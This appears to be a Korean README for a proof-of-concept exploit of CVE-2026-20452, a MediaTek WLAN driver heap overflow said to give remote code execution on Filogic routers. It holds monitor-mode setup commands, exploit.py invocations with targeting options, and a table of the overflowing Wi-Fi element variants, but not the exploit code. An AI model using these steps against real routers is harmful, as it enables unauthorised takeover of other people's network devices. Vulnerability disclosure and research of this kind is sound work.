
CVE-2026-20452에 대한 개념 증명 익스플로잇, MediaTek WLAN AP 드라이버의 힙 기반 버퍼 오버플로우 취약점입니다. scapy를 사용하여 조작된 Wi-Fi 관리 프레임을 전송하여 영향을 받는 Filogic 라우터에서 원격 코드 실행을 유발합니다.
CVE-2026-20452에 대한 개념 증명 익스플로잇입니다. MediaTek WLAN 액세스 포인트 드라이버의 힙 기반 버퍼 오버플로우입니다.
https://www.hunt-benito.com/blog/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/
pip install scapy)sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Interface becomes wlan0mon
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
--overflow-size 1024 --variant 2 --count 50 --delay 0.05
이 도구는 승인된 보안 연구 및 교육 목적으로만 제공됩니다. Wi-Fi 주파수 전송은 귀하의 관할권에서 법적 승인이 필요할 수 있습니다. 귀하가 소유하지 않거나 테스트할 명시적 권한이 없는 시스템에 대한 무단 사용은 불법입니다. 저자는 어떠한 책임도 지지 않으며, 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.
| 변종 | IE 유형 | 설명 |
|---|
| 0 | Vendor Specific (221) | 단일 초대형 IE, OUI 00:50:43 포함 |
| 1 | Chained Vendor IEs | 인접한 힙 객체를 손상시키기 위한 여러 개의 작은 IE |
| 2 | HT Capabilities (45) | 초대형 HT Capabilities IE |
| 3 | Extended Capabilities (127) | 초대형 Extended Capabilities IE |